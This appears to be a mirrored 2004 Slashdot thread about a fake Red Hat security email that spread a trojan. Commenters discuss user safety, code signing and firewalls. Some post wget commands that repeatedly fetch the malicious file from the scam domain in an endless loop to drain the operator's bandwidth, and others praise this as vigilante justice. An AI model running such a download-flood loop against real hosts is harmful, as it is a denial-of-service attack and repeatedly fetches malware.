Slashdot Mirror
Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.
Stay tuned.
It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
Those who can make you believe absurdities can make you commit atrocities. - Voltaire
From shc's manpage:
Definitly doing something then, at least viewing the parent post.
Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".
This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.
Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.
Most people could have done better, IMHO.
Comment forecast: Bits of genius surrounded by a sea of mediocrity.
Going to the site, The use of Redhat logo and Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain is taken down.
My question is: can these a**holes get away with using the 'fedora' name instead?
ps. I am not affilated with RH in anyway.
Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.
Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.
.NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.
,the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.
Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.
Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"
Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and
First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).
In conclusion. I want to say that I believe if all people had:
1) Startup Monitor - Painfully simple, no one should be without it.
2) Kerio Personal Firewall, or equivalent
3) An executable monitor as described above.
* SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)
yes but which Raymond Jackson?
Ones a teacher, one is guilty of child abuse (something to be unpopular for) and one just lost a football game today (/thinks of ace ventura plot)
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
UNIX? They're not even circumcised! Savages!
And allowing only registered executables to run is a bad thing. Who should decide?
On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.
The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.
Like what I said? You might like my music
wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
Let's use all of his bandwidth quota up.
This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.
z ; rm fileutils-1.0.6.patch.tar.gz; done
I'm running the following script on my box, and I recommend others to do the same.
while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.
Join the NFSNET. Our prime goal is making little numbers out of big ones. http://www.nfsnet.org/
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
Malike Bamiyi wanted my assistance.
To : abuse@everyone.net,
abuse@above.net
Subject : malware using your netblock to propagate
http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106
The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.
Better yet, you should gather the list of infected IPs and then inform
the owners.
Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-
I confirm, it's Romanian, I translated in other post, nothing important, the writer is an idiot.
"It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
You have got to be kidding me.
/. is a large group and some pay more attention to security and these kinds of attacks than others. Not to mention, too many people visit here to have "probability = 0" be a realistic assessment.
While I'm not intending to insult anyone's intelligence here,
'Grandma' should never be in the position to install software, IMO. I've been talking to my grandmother about a linux installation for a while, and I will hold 'the keys' and help her out via ssh. As she's pretty set in her ways with her software choices, it should be pretty simple as far as time is concerned.
If you want to advocate linux, don't bother advocating education along with it. Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it. Not everyone wants to learn how to pay attention to computer security, heck, some people don't even care enough to program their VCR clock (I know, dated analogy, feh).
Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it.
Really? IMHO computers probably are as easy as cars. i.e. if my car needs some maintenance, I don't do it myself (at least, not for anything but the most simple stuff - I wouldn't know where to start), I go to the garage and pay someone who knows what he's doing to fix it. The same applies to computers - if you need some maintenance doing to your computer and you don't know enough to do it yourself then you should be paying a professional to look at it.
Too many people have an attitude of "it should be simple enough for me to maintain" when it comes to computers - I have to ask why? How many people strip down their car engine and then are left with a pile of bits on the floor with no clue how to put them back together and blame the car manufacturer for not making it "easy enough"?
Just because a computer plugs into the wall like a toaster doesn't mean that the user has a "right" to be able to maintain it without any training. I think people need to get out of the idea that computers are things which you buy and then they don't need any upkeep - computers are definately things that you buy and then need maintenance every so often. Some of us are knowledgable to do it ourselves, but the rest should get a professional to sort it out. Maybe manufacturers specifying that a computer requires a yearly service by a professional engineer would be a good idea?
http://blog.nexusuk.org